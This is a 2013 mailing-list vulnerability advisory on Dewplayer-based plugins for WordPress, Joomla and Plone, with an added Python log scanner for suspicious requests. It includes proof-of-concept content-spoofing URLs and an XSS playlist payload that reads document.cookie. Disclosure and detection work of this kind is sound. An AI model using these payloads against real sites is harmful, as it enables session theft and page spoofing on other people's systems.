Message-ID: <008401cf025d$9aa93bf0$9b7a6fd5@pc>
Date: Thu, 26 Dec 2013 19:11:09 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer

Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer.

Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is a media player, which is used at thousands of web sites and in multiple web applications. There are nearly 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others).

This flash media player is used in the following plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. Also there can be other plugins with Dewplayer.

-------------------------
Affected products:
-------------------------

Vulnerable are the following web applications: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions.

Vulnerable are web applications which are using Dewplayer 2.2.2 and previous versions.

-------------------------
Affected vendors:
-------------------------

Plugins for different CMS with Dewplayer:

http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/
http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779
http://plone.org/products/collective.dewplayer

----------
Details:
----------

These are examples of some vulnerabilities in Dewplayer; for examples of all CS and XSS vulnerabilities, see the above-mentioned advisory.

Dewplayer for WordPress:

Plugin contains the following flash-files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes.

Content Spoofing (Content Injection) (WASC-12):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php

JosDewplayer and mosdewplayer:

Plugin JosDewplayer is based on mosdewplayer, so holes must be similar in them.

Plugin contains the following flash-files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes.

http://site/plugins/content/josdewplayer/dewplayer.swf

collective.dewplayer:

Plugin contains the following flash-files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash-files have CS holes and dewplayer-vinyl.swf also has XSS holes.

The path on a web site can be different:

http://site/files/++resource++collective.dewplayer/dewplayer.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/dewplayer.swf?mp3=1.mp3

XSS (WASC-08):

http://site/path/dewplayer-vinyl.swf?xml=xss.xml

xss.xml

<playlist version="1">
  <trackList>
    <track>
      <location>javascript:alert(document.cookie)</location>
      <title>XSS</title>
    </track>
  </trackList>
</playlist>

------------
Timeline:
------------

2013.10.25 - announced at my site.
2013.10.26 - informed developers.
2013.12.19 - disclosed at my site about Dewplayer.
2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
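
Added example (not part of the original message and not code from MustLive or the plugin authors): a log-review helper that lists requests to dewplayer*.swf carrying the query parameters named in the advisory. It assumes common/combined-format access logs; the function name, the issue labels, and the rule that only absolute or protocol-relative media URLs are flagged for the mp3/file/sound/son parameters are assumptions of this example, so hits are candidates for review, not confirmed abuse.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters named in the advisory.
CS_PARAMS = {"mp3", "file", "sound", "son"}   # content spoofing
XSS_PARAMS = {"xml"}                          # playlist XSS in dewplayer-vinyl.swf
# Request line of a common/combined-format log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
SWF_RE = re.compile(r"/(dewplayer[\w-]*\.swf)$", re.IGNORECASE)
# Assumption of this example: a value with a scheme or a leading // is off-site.
OFFSITE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:|//)", re.IGNORECASE)


def review_dewplayer_requests(log_lines):
    """Return (swf, issue, param, value) tuples for requests worth reviewing."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        swf = SWF_RE.search(url.path)
        if not swf:
            continue
        name = swf.group(1).lower()
        for param, values in parse_qs(url.query).items():
            key = param.lower()
            for value in values:
                if key in XSS_PARAMS and "vinyl" in name:
                    findings.append((name, "xss-playlist", key, value))
                elif key in CS_PARAMS and OFFSITE_RE.match(value):
                    findings.append((name, "content-spoofing", key, value))
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Dec/2013:19:11:09 +0200] "GET /wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=http://media.example.net/a.mp3 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [26/Dec/2013:19:11:10 +0200] "GET /path/dewplayer-vinyl.swf?xml=xss.xml HTTP/1.1" 200 9000',
    '198.51.100.7 - - [26/Dec/2013:19:12:00 +0200] "GET /wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Dec/2013:19:12:01 +0200] "GET /index.php?file=http://x.example/ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in review_dewplayer_requests(SAMPLE_LOG):
        print(finding)
```

Every xml= request to dewplayer-vinyl.swf is listed because the playlist content itself does not appear in the access log and has to be checked separately.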